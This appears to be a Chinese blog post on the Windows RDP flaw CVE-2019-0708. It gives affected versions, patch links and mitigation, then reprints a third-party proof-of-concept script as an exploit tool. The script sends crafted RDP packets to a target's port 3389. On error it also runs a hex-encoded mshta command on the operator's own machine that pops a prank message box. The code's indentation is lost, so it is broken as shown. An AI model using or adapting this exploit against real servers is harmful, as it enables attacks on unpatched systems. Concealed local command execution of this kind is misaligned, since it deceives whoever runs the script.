我的朋友圈被刷屏了
(CVE-2019-0708)
时时跟进互联网所发生的新闻新鲜事,昨天朋友圈被一个打篮球的人给刷屏了,他说他同时会唱、跳、RAP、篮球为什么只留下了一个篮球?就连国外的老黑们好像都知道了CXK,不知道他们百度一下CXK会是什么样的表情。
还有我朋友们说我打篮球的样子像极了CXK!是不是在夸我啊?我好快落。
当你检测服务器时会提示:
you play basketball like caixukun
我并不知道是什么意思,那位大佬好心告诉我一下。
回归正题
CVE-2019-0708远程桌面服务远程代码执行漏洞
一、漏洞信息:
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708(https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708),此漏洞是预身份验证且无需用户交互(无需验证系统账户密码),这就意味着这个漏洞可以通过网络蠕虫的方式被利用。
二、影响范围:
该漏洞影响了某些旧版本的Windows系统,如下:
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
三、需要注意的是:
对于Windows 7及Windows Server 2008的用户,及时安装Windows发布的安全更新。可以在Microsoft安全更新指南中找到支持Windows版本的安全更新进行下载。
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
(一)升级到最新版本
对于Windows 2003及Windows XP的用户,请及时更新到最新系统版本。微软在KB4500705中为这些不支持的Windows版本提供了修复程序。
对于Windows 2003及Windows XP的用户,及时更新系统版本。
(二)临时危害减轻措施:
开启网络身份验证(NLA)
2003补丁下载地址:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
2008R2补丁下载地址:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
更新后记得及时保存业务并重启服务器,使补丁生效(2008R2补丁编号kb4499175)。
Windows 8和Windows 10及之后版本的用户不受此漏洞影响。
受到影响的系统用户请讯速打系统漏洞补丁,据传闻讲系统早就存在漏洞了只不过现在才报出来。
error 404
error 404
error 404
error 404
error 404
利用工具:
我也不知道这个Github是什么,我也不敢问~~~
https://github.com/k8gege/CVE-2019-0708/blob/master/CVE-2019-0708-POC.py
这是K8GEGE开发的工具,当你检测服务器IP成功的时候,此时响起音乐J你太美。。。。。
#RDP Blue POC by k8gege
#Local: Win7 (python)
#Target: Win2003 & Win2008 (open 3389)
import socket
import sys
import os
import platform
buf=""
buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x7f\x65\x82\x01\x94\x04" #SERVICE T.125
buf+="\x01\x01\x04\x01\x01\x01\x01\xff"
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"#COMMUNICATION
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"# TPKT, Version 5, Lenght 12
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"#MULTIPOINT
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"#message
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"# TPKT, Version 3, Lenght 12
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"# TPKT, Version 8, Lenght 12
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#nop
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"#ITU-T Rec X.224
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"#ITU-T Rec X.224
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0"
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
buf+="\x06\xd0\x00\x00\x12\x34\x00" #ITU-T Rec X.224
buf2="\x23\x79\x6F\x75\x20\x70\x6C\x61\x79\x20"
buf2+="\x62\x61\x73\x6B\x65\x74\x62\x61\x6C\x6C"
buf2+="\x20\x6C\x69\x6B\x65\x20\x63\x61\x69\x78"
buf2+="\x75\x6B\x75\x6E\x23";
sc="\x6D\x73\x68\x74\x61\x20\x76\x62\x73\x63" #shellcode
sc+="\x72\x69\x70\x74\x3A\x6D\x73\x67\x62\x6F"
sc+="\x78\x28\x22\x79\x6F\x75\x20\x70\x6C\x61"
sc+="\x79\x20\x62\x61\x73\x6B\x65\x74\x62\x61"
sc+="\x6C\x6C\x20\x6C\x69\x6B\x65\x20\x63\x61"
sc+="\x69\x78\x75\x6B\x75\x6E\x21\x22\x2C\x36"
sc+="\x34\x2C\x22\x4B\x38\x67\x65\x67\x65\x3A"
sc+="\x22\x29\x28\x77\x69\x6E\x64\x6F\x77\x2E"
sc+="\x63\x6C\x6F\x73\x65\x29";
HOST = sys.argv[1]
PORT = 3389
print "Win2003 & Win2008 RDP POC"
print "Target: "+HOST
recexec=buf
for i in range(8):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
print "sending: %d bytes" % len(buf)
s.send(buf)
rec = s.recv(100)
recexec=sc
print "received: %d bytes" % len(rec)
s.close()
print ""
except:
if(platform.system()=="Windows"):
os.system(recexec)
“IT同路人”微信公众号
投稿邮箱:[email protected]
推荐阅读:
@fkmY9h1M:您好,贵站已经添加!
提交链接
类别:在线工具 名称:喵喵工具集 地...
提交链接
您好站长,申请贵站收录 网站名称:...
提交链接
@5ZN2liXC:您好,已经添加了哦!...
提交链接
您好站长,申请贵站收录 网站名称:...
提交链接
@5ZN2liXC:您好,已经添加了哦!...
提交链接
类别:博客站点 名称:小报童专栏 地...
提交链接
类别:在线工具 名称:夸克搜 地址:...
提交链接